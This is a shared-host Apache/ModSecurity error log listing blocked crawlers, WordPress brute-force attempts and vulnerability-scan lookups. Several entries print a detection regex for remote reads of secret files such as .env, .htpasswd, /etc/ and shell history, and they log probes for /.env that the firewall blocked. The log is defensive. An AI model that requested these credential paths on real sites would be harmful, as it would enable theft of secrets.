[Tue May 26 16:33:55.110886 2026] [security2:error] [pid 808625:tid 808763] [client 47.128.60.105:37714] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/robots.txt"] [unique_id "ahV-GzEl_SBaWibfDmpaUgAAAAg"]
[Tue May 26 16:33:55.443151 2026] [core:error] [pid 808625:tid 808759] [client 74.7.228.39:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:33:55.443183 2026] [core:error] [pid 808625:tid 808759] [client 74.7.228.39:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:33:55.443316 2026] [security2:error] [pid 808625:tid 808759] [client 74.7.228.39:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "cpanel.afstpaul.org"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahV-GzEl_SBaWibfDmpaWwAAAAQ"]
[Tue May 26 16:33:55.443931 2026] [security2:error] [pid 808625:tid 808832] [client 74.7.228.39:48658] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "cpanel.afstpaul.org"] [uri "/___proxy_subdomain_cpanel/robots.txt"] [unique_id "ahV-GzEl_SBaWibfDmpaWQAATUo"]
[Tue May 26 16:33:56.601787 2026] [security2:error] [pid 808625:tid 808837] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-GzEl_SBaWibfDmpaawAAAFI"]
[Tue May 26 16:33:57.725596 2026] [security2:error] [pid 808625:tid 808763] [client 117.198.37.168:56410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-HTEl_SBaWibfDmpamQAAAAg"]
[Tue May 26 16:33:57.725729 2026] [security2:error] [pid 808625:tid 808763] [client 117.198.37.168:56410] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-HTEl_SBaWibfDmpamQAAAAg"]
[Tue May 26 16:33:58.888873 2026] [security2:error] [pid 808625:tid 808880] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-HTEl_SBaWibfDmpanwAAAH0"]
[Tue May 26 16:33:59.607190 2026] [security2:error] [pid 808625:tid 808784] [client 176.65.139.235:33852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-HzEl_SBaWibfDmpaxgAAAB0"]
[Tue May 26 16:33:59.626051 2026] [security2:error] [pid 808625:tid 808874] [client 176.65.139.232:43080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jailanitradingcompany.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-HzEl_SBaWibfDmpaxwAAAHc"]
[Tue May 26 16:33:59.821364 2026] [security2:error] [pid 808625:tid 808799] [client 176.65.139.238:17928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-HzEl_SBaWibfDmpazgAAACw"]
[Tue May 26 16:34:00.834912 2026] [security2:error] [pid 808625:tid 808844] [client 86.149.220.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-HzEl_SBaWibfDmpaygAAAFk"]
[Tue May 26 16:34:01.311785 2026] [security2:error] [pid 808625:tid 808785] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-IDEl_SBaWibfDmpa1QAAAB4"]
[Tue May 26 16:34:01.316122 2026] [security2:error] [pid 808625:tid 808725] [remote 57.141.2.56:27906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV-ITEl_SBaWibfDmpa6AAAE2M"]
[Tue May 26 16:34:01.907358 2026] [security2:error] [pid 808625:tid 808775] [client 114.119.128.56:26563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV-ITEl_SBaWibfDmpa7gAAABQ"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_79
[Tue May 26 16:34:02.210835 2026] [security2:error] [pid 808625:tid 808860] [client 14.227.136.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-IDEl_SBaWibfDmpa4gAAAGk"]
[Tue May 26 16:34:02.440686 2026] [security2:error] [pid 808625:tid 808786] [client 114.119.156.142:52819] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive/2020/10/07/1.jpg"] [unique_id "ahV-IjEl_SBaWibfDmpa-gAAAB8"], referer: https://samayikprasanga.in/archive/2020/10/07/1.jpg
[Tue May 26 16:34:03.388849 2026] [security2:error] [pid 808625:tid 808824] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-IjEl_SBaWibfDmpa_QAAAEU"]
[Tue May 26 16:34:04.510646 2026] [security2:error] [pid 808625:tid 808806] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-IzEl_SBaWibfDmpbEwAAADM"]
[Tue May 26 16:34:06.248380 2026] [security2:error] [pid 808625:tid 808631] [remote 74.7.241.15:54622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-about-warrant.php"] [unique_id "ahV-JjEl_SBaWibfDmpbRgAAKwU"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:34:07.647790 2026] [core:crit] [pid 808625:tid 808874] (13)Permission denied: [client 52.167.144.228:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:34:07.755186 2026] [security2:error] [pid 808625:tid 808774] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-JjEl_SBaWibfDmpbWwAAABM"]
[Tue May 26 16:34:08.600007 2026] [security2:error] [pid 808625:tid 808794] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-KDEl_SBaWibfDmpbbwAAACc"]
[Tue May 26 16:34:08.822886 2026] [security2:error] [pid 808625:tid 808786] [client 117.198.37.168:56735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-KDEl_SBaWibfDmpbfAAAAB8"]
[Tue May 26 16:34:08.822991 2026] [security2:error] [pid 808625:tid 808786] [client 117.198.37.168:56735] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-KDEl_SBaWibfDmpbfAAAAB8"]
[Tue May 26 16:34:09.097924 2026] [security2:error] [pid 808625:tid 808734] [remote 40.77.167.151:25051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/soccer.php"] [unique_id "ahV-KTEl_SBaWibfDmpbgAAAKGw"]
[Tue May 26 16:34:10.458328 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-KjEl_SBaWibfDmpblwAAAF4"]
[Tue May 26 16:34:11.424836 2026] [security2:error] [pid 808625:tid 808875] [client 89.116.58.52:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV-KzEl_SBaWibfDmpbzAAAAHg"]
[Tue May 26 16:34:11.425548 2026] [security2:error] [pid 808625:tid 808786] [client 89.116.58.52:48916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahV-KzEl_SBaWibfDmpbygAAAB8"]
[Tue May 26 16:34:12.685570 2026] [security2:error] [pid 808625:tid 808799] [client 89.116.58.52:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahV-LDEl_SBaWibfDmpb6gAAADA"]
[Tue May 26 16:34:13.033190 2026] [security2:error] [pid 808625:tid 808823] [client 89.116.58.52:48918] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahV-LDEl_SBaWibfDmpb5wAAAEQ"]
[Tue May 26 16:34:13.384914 2026] [security2:error] [pid 808625:tid 808842] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-LDEl_SBaWibfDmpb4wAAAFc"]
[Tue May 26 16:34:14.882582 2026] [security2:error] [pid 808625:tid 808882] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-LTEl_SBaWibfDmpcBgAAAH8"]
[Tue May 26 16:34:17.167834 2026] [security2:error] [pid 808625:tid 808882] [client 114.119.156.144:26705] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/robots.txt"] [unique_id "ahV-MTEl_SBaWibfDmpcRQAAAH8"]
[Tue May 26 16:34:17.616310 2026] [security2:error] [pid 808625:tid 808770] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-MDEl_SBaWibfDmpcNgAAAA8"]
[Tue May 26 16:34:18.060325 2026] [security2:error] [pid 808625:tid 808756] [client 94.23.188.218:55250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.jailanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahV-MjEl_SBaWibfDmpcVQAAAAE"]
[Tue May 26 16:34:18.060450 2026] [security2:error] [pid 808625:tid 808756] [client 94.23.188.218:55250] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.jailanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahV-MjEl_SBaWibfDmpcVQAAAAE"]
[Tue May 26 16:34:18.565409 2026] [security2:error] [pid 808625:tid 808819] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-MTEl_SBaWibfDmpcTgAAAEA"]
[Tue May 26 16:34:19.517752 2026] [security2:error] [pid 808625:tid 808842] [client 117.198.37.168:57024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-MzEl_SBaWibfDmpcbwAAAFc"]
[Tue May 26 16:34:19.517927 2026] [security2:error] [pid 808625:tid 808842] [client 117.198.37.168:57024] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-MzEl_SBaWibfDmpcbwAAAFc"]
[Tue May 26 16:34:19.524990 2026] [security2:error] [pid 808625:tid 808758] [client 142.44.225.191:62652] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.jailanitradingcompany.com"] [uri "/"] [unique_id "ahV-MzEl_SBaWibfDmpccAAAAAM"]
[Tue May 26 16:34:19.525146 2026] [security2:error] [pid 808625:tid 808758] [client 142.44.225.191:62652] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.jailanitradingcompany.com"] [uri "/"] [unique_id "ahV-MzEl_SBaWibfDmpccAAAAAM"]
[Tue May 26 16:34:20.435821 2026] [security2:error] [pid 808625:tid 808870] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-MzEl_SBaWibfDmpcdAAAAHM"]
[Tue May 26 16:34:22.827362 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-NTEl_SBaWibfDmpcpAAAAHU"]
[Tue May 26 16:34:25.739994 2026] [security2:error] [pid 808625:tid 808843] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ODEl_SBaWibfDmpc1wAAAFg"]
[Tue May 26 16:34:26.856217 2026] [security2:error] [pid 808625:tid 808882] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-OTEl_SBaWibfDmpc5wAAAH8"]
[Tue May 26 16:34:29.084418 2026] [security2:error] [pid 808625:tid 808843] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-PDEl_SBaWibfDmpdEgAAAFg"]
[Tue May 26 16:34:30.079048 2026] [security2:error] [pid 808625:tid 808840] [client 14.245.135.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-PDEl_SBaWibfDmpdHwAAAFU"]
[Tue May 26 16:34:30.118956 2026] [security2:error] [pid 808625:tid 808868] [client 117.198.37.168:57331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-PjEl_SBaWibfDmpdPQAAAHE"]
[Tue May 26 16:34:30.119062 2026] [security2:error] [pid 808625:tid 808868] [client 117.198.37.168:57331] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-PjEl_SBaWibfDmpdPQAAAHE"]
[Tue May 26 16:34:30.675083 2026] [security2:error] [pid 808625:tid 808722] [remote 74.7.241.58:43554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV-PjEl_SBaWibfDmpdSgAAJWA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/php-compat
[Tue May 26 16:34:31.528905 2026] [security2:error] [pid 808625:tid 808867] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-PTEl_SBaWibfDmpdNgAAAHA"]
[Tue May 26 16:34:31.782548 2026] [security2:error] [pid 808625:tid 808850] [client 176.65.139.232:46174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rbkgroups.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-PzEl_SBaWibfDmpdXQAAAF8"]
[Tue May 26 16:34:31.790150 2026] [security2:error] [pid 808625:tid 808810] [client 176.65.139.229:60392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "krishnawoodworks.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-PzEl_SBaWibfDmpdXgAAADc"]
[Tue May 26 16:34:33.437010 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-QDEl_SBaWibfDmpdawAAAF4"]
[Tue May 26 16:34:35.371643 2026] [security2:error] [pid 808625:tid 808810] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-QjEl_SBaWibfDmpdiQAAADc"]
[Tue May 26 16:34:36.919024 2026] [security2:error] [pid 808625:tid 808769] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-QzEl_SBaWibfDmpdpAAAAA4"]
[Tue May 26 16:34:38.550506 2026] [security2:error] [pid 808625:tid 808723] [remote 82.196.25.136:33630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV-RjEl_SBaWibfDmpdzAAAWGE"]
[Tue May 26 16:34:38.708510 2026] [security2:error] [pid 808625:tid 808850] [client 185.191.171.13:31074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-08-18/"] [unique_id "ahV-RjEl_SBaWibfDmpd0AAAAF8"]
